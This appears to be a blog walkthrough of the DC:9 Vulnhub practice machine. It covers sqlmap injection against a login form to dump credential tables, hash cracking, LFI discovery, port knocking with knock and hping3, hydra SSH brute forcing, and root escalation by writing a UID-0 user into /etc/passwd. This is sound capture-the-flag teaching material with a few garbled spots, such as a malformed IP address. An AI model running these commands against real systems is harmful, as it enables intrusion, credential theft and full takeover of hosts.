I have some terrible news, this will be my last DC vulnhub tutorial so read on and let’s get started on the DC:9 Vulnhub tutorial. The author (@DC9) made an announcement that the 9th iteration of his DC vulnub series would be his last.
- How to Ace Your Junior Penetration Tester Interview and Land the Job
- Another PowerView Tutorial: How To Use PowerView In A Penetration Test
- The HackMyVM Keys Walkthrough
- OSCP Prep: M87 Vulnhub Walkthrough
- The Hacker Kid Vulnhub Walkthrough
Table of Contents
Here’s What You Need
- Kali Linux Vulnhub Machine – VirtualBox
- DC:9 Virtual Machine – VirtualBox
Initial Enumeration – Recon
A first step is to do an nmap scan and see what is running on the target.
Ok so we have TCP 80 open and it looks like TCP 22 is filtered hmm.
Looking at the open port I see a web page.
Exploit the Webapp Using SQLmap
The first step is to enter a test entry for the login page and send the request to sqlmap for automatic exploitation, isn’t life grand?
I had some issue with this process at first. It turns out what you want to do is actually right click on the request page and click on “save item” and choose a directory to save the request in.
Before doing this I was just copy and pasting the request into a new file and going off of that which did not work and got an “invalid file format” error message.
POST /results.php HTTP/1.1
Host: 10.0.0.235
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.235/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close
Upgrade-Insecure-Requests: 1
search=wtf
root@kali:~/dc9# sqlmap -r req.txt -D Staff --dump-all Now that I have a password I will put it in john if need be, but first let’s check hashkiller or crackstation.net.
Hash Type Result
856f5de590ef37314e7c3bdf6f8a66dc md5 transorbital1The password is “transorbital1”, joy.
This new set of credentials can be tested for logging into the app. There is a dead giveaway here looking at the new page in the context of an exploitable vulnerability.
Notice how the page says “File does not exist”, this means the web server is looking for configuration files and likely means there is a local file inclusion vulnerability.
See what parameters we can mess with on the web app. First I try gobuster.
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.0.0.235
[+] Threads: 10
[+] Wordlist: /root/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Verbose: true
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
Found: /.hta (Status: 403)
Found: /.htaccess (Status: 403)
Found: /.htpasswd (Status: 403)
Found: /css (Status: 301)
Found: /includes (Status: 301)
Found: /index.php (Status: 200)
Found: /server-status (Status: 403)
===============================================================
Then I tried dirsearch.py but then I moved on to dotdotpwn.
sudo apt-get install dotdotpwn
dotdotpwn.pl -m http -h 10.0.0.235 -M GETOk so we have something about a sequence and it being equal to 3 numbers separated by commas.
How to Do Pork Knocking
Can do port knocking using knock.
apt install knockd
knock 10.0.0.235 7469 8475 9842or you can do it using hping3.
hping3 -S 10.0.0.235 -p 7469 -c 1; hping3 -S 10.0.0.235 -p 8475 -c 1; hping3 -S 10.0.0.235 -p 9842 -c 1After the sequence of ports to knock on is sent the SSH port is now open for business.
See how the TCP 22 port is now open?
Exploit SSH
Remember that dumping this table on the MYSQL database on the target server displayed a bunch of usernames and passwords?
Let’s take those and try brute forcing authentication on the SSH service.
sqlmap -r req.txt -D users --dump-allLook at all those passwords!
Grab all of these and put them into a new file, one file for usernames and one for passwords.
Now using hydra I will brute force the possible credentials against the running and now open SSH service.
hydra -L usernames -P passwords 10.0.0.0.235 ssh
Post Exploitation
Linux post exploitation techniques cover the bases for all common misconfigurations such as file permissions and weak service permissions.
So here is the current situation we are currently logged in as the user: janitor.
Looking around in the current home directory for this user there is an obviously interesting file “secrets-f
For post exploitation on DC:9 we are going to revisit the username and password list since we now have a new development.
That development is a new set of passwords.
Now we can trade in that old set of credentials used before for the user janitor for the new sets. It turns out fredf is the new user of interest and we will continue with it.
Looking at what permissions the new user fredf has we see there is one entry, he can run a command named test found in the /devstuff/test directory.
Looking at the Python file referenced by running the test binary we can see it has a pretty simple purpose.
I found the Python script by working backwards from the test binary and looking around at each directory until finding the test.py file.
The rule for creating a new user is to give it an encrypted password and some other fine details which I demonstrate in the code here below.
fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt guru password
$1$guru$E6rG/rKT4YVe9xb5upc/g0
fredf@dc-9:/opt/devstuff$ nano /tmp/newtry
fredf@dc-9:/opt/devstuff$ cat /tmp/newtry
guru:$1$guru$E6rG/rKT4YVe9xb5upc/g0:0:0::/root:/bin/bash
fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/newtry /etc/passwd
fredf@dc-9:/opt/devstuff$ su guru
Password:
root@dc-9:/opt/devstuff# ls
build dist __pycache__ test.py test.spec
root@dc-9:/opt/devstuff# cd ~
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
Since this binary is basic and it just takes in one file as stdin and writes out the files contents as stdout to a new file we can just overwrite the Linux security files!
You could also overwrite the the /etc/sudoers file and add your new user as a sudo user and do it that way too.
That is all for the last DC Vulnhub tutorial.